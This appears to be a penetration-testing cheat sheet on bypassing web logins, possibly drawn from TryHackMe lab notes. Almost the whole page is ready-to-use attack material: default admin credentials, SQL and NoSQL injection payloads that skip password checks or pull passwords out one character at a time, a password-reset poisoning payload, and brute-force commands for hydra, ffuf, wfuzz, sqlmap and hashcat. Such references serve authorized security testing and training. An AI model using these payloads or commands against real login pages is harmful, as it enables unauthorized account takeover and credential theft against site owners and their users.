Web Login Bypass

Common Default Credentials

Check if the website has not changed credential from the default username/password.

admin:admin
admin:password
admin:password1
admin:password123
admin:passw0rd
admin:(empty)
admin:12345

administrator:password
administrator:password1
administrator:password123
administrator:passw0rd
administrator:(empty)
administrator:12345

# phpIPAM
admin:ipamadmin
Admin:ipamadmin

# PHPMyAdmin
root:(null)
root:password

SQL Injections

Try the following inputs in the form.

'
'--
'-- -
'#
}'
}'--
}'-- -
}'#
' or 1=1
' or 1=1--
' or 1=1-- -
' or '1'='1
' or '1'='1--
' or '1'='1-- -
' or true--
' or true-- -
or true--

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2--
UNION SELECT NULL--

Password Omitting

If we know the username of an existing account, try to add suffix '-- - to the username for forcing the server internally to omit the password.

username: john'-- -
password: password123 (arbitrary value)

When the login is successful, not only can we log in with that user, but we can also fuzz with other usernames.

NoSQL Injection

Reference: https://portswigger.net/web-security/nosql-injection

Mongo

' || 1==1//
' || 1==1%00
' || '1==1
' || '1'=='1
'||1||'

<!-- Brute force each password character -->
admin' && this.password[0] == 'a' || 'a' == 'b
admin' && this.password[1] == 'a' || 'a' == 'b
admin' && this.password[2] == 'a' || 'a' == 'b
admin'%26%26+this.password[0]=='a'||'a'=='b

• Operators

  # $ne: Not equal
  username[$ne]=xyz&password[$ne]=xyz
  username[$ne]=xyz&password=test
  
  # $regex: Regular expressions
  username[$regex]=.*&password[$regex]=.*
  username[$regex]=^xyz&password[$regex]=^xyz
  username[$regex]=^a.*$&password[$ne]=xyz
  username[$regex]=.{6}&password[$ne]=xyz
  username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values
  
  # $exists: Exists in the database
  username[$exists]=true&password[$exists]=true
  
  # $in: Include in array
  username[$in]=[admin]&password[$ne]=xyz
  
  # $nin: Not include
  username[$nin][admin]=admin&password[$ne]=xyz
  # If we found the "admin" exists, we can exclude "admin" by specifying $nin operator.
  username[$nin][]=admin&password[$ne]=xyz
  # If more users are found, we can exclude the user.
  username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz
  
  # $gt: Greater than
  username[$gt]=s&password[$gt]=s
  # $lt: Lower than
  username[$lt]=s&password[$lt]=s
  
  # Combinations
  username[$ne]=xyz&password[$regex]=.*
  username[$exists]=true&password[$ne]=xyz
  username[$ne]=xyz&password[$exists]=true
  username[$regex]=.*&password[$ne]=xyz
  username[$ne]=xyz&password[$regex]=.*
  username[$regex]=.{6}&password[$ne]=xyz

  After finding usernames, we can also obtain the passwords using the “$regex” operator as the following example.

  # Check if the password length is 7 characters.
  username=admin&password[$regex]=^.{7}$
  # If not, change 7 to 6 (or 8 or something number).
  username=admin&password[$regex]=^.{6}$
  # If the number of characters turns out to be 6, brute force the character one by one.
  username=admin&password[$regex]=^a.....$
  username=admin&password[$regex]=^s.....$
  username=admin&password[$regex]=^se....$
  username=admin&password[$regex]=^sec...$

• Operators in Json

  If the above payloads not working, try changing to a json format. We also need to change the value of the Content-Type to “application/json” in the HTTP header.

  # Not equal
  {"username": { "$ne": "xyz" }, "password": { "$ne": "xyz" }}
  
  # $in: Include in array
  {"username":{"$in":["admin","administrator",]},"password":{"$ne":""}}

SQL Injection with SQLmap

Alternatively, we can automate SQLi using sqlmap.

# 'req.txt' is a file which can be downloaded in Burp Suite by clicking `save item` on the request.
sqlmap -r req.txt
sqlmap -r req.txt --risk 2 --level 5
sqlmap -r req.txt --risk 3 --level 5

Please see SQL Injection with Sqlmap page for details.

Wildcard Brute Force

If it is allowed to login with wildcard (*), you may be able to find the username/password with brute force.

username = *
password = *

For example, in Turbo Intruder (Burp Suite), login attempt with alpha numeric characters one by one.

username=%s*&password=*
# or
username=*&password=%s*

My favorite wordlist for it is the seclists: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case-extra.txt

Password Reset Exploit

We may be able to retrieve the password reset link by specifying our email address instead of (in addition to) the victim email address without validation.

email[]=victim@email.com&email[]=evil@email.com

Brute Force Credentials

Before brute forcing, we need wordlists used for it.

• Rockyou

• SecLists

• CeWL

  Generate the custom wordlist from the target web page.

  cewl https://example.com -w wordlist.txt
  cewl https://example.com/about-us -w usernames.txt
  # -d: Depth
  # -m: Minimum word length
  cewl -d 2 -m 5 https://example.com -w wordlist.txt
  # --extentions
  cewl https://example.com -w wordlist.txt --lowercase
  cewl https://example.com -w wordlist.txt --with-numbers

• [crunch]

  crunch <min> <max> <chars> -o wordlist.txt
  # e.g.
  crunch 3 5 0123456789ABCDEF -o wordlist.txt

If we can predict the target password reasonably, we can generate passwords from the password.

echo -n 'passw0rd' > password.txt
hashcat --stdout password.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt

Using Ffuf

# -fc: Filter HTTP status code
ffuf -w passwords -X POST -d "username=admin&password=FUZZ" -u http://vulnerable.com/login -fc 401

# Basic Auth
ffuf -u https://admin:FUZZ@example.com/ -w wordlist.txt -fc 401

Also we can use raw request file of Burp Suite.

1. Send request in Burp Suite.

2. Right-click on the request screen.

3. Click "Copy to file" in the menu.

4. Edit the raw file to change target value to "FUZZ" keyword.

After that, we can use it in the ffuf command.

# Interate with Burp Suite raw request
ffuf -u http://example.com/login -request raw.txt -x http://127.0.0.1:8080 -w wordlist.txt

Using Hydra

# Cracking username
hydra -L usernames.txt -p password vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
# Cracking password
hydra -l username -P passwords.txt vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid password"

# HTTPS (https-post-form)
hydra -L usernames.txt -P passwords.txt vulnerable.com https-post-form "/login:username=^USER^&password=^PASS^:Username or password is incorrect"


# Cracking the Authorization or WWW-Authenticate in the request header.
hydra -L usernames.txt -P passwords.txt <target-ip> http-get

Using Wfuzz

# Cracking username
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" -u https://example.com/login
# Cracking password
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" -u https://example.com/login
# Crack username/password
wfuzz -z file,./usernames.txt -z file,./passwords.txt -d "username=FUZZ&password=FUZ2Z" -u https://example.com/login

# Range: 00-99 -> "password00", "password01", ..., "password99"
# -t: N threads
# -s: N seconds per request
wfuzz -z range,00-99 -d "username=admin&password=passwordFUZZ&submit=Submit" -X POST -u https://example.com/login -t 1 -s 20

# -- Options --------------------------------------------------------------------------------------------

# --hc: Hide the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --hc 302 -u http://example.com/login
# --hh: Hide the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --hh 783 -u http://example.com/login

# --sc: Show the specific statuc code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --sc 302 -u http://example.com/login
# --sh: Show the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --sh 1214 -u http://example.com/login

# --ss: Show specified string
wfuzz -z file,./wordlist.txt -d "username=admin&password=FUZZ" -u https://example.com/login --ss "Login success"
# --hs: Hide specified string
wfuzz -z file,./wordlist.txt -d "username=admin&password=FUZZ" -u https://example.com/login --hs "Login failed"

References

• TryHackMe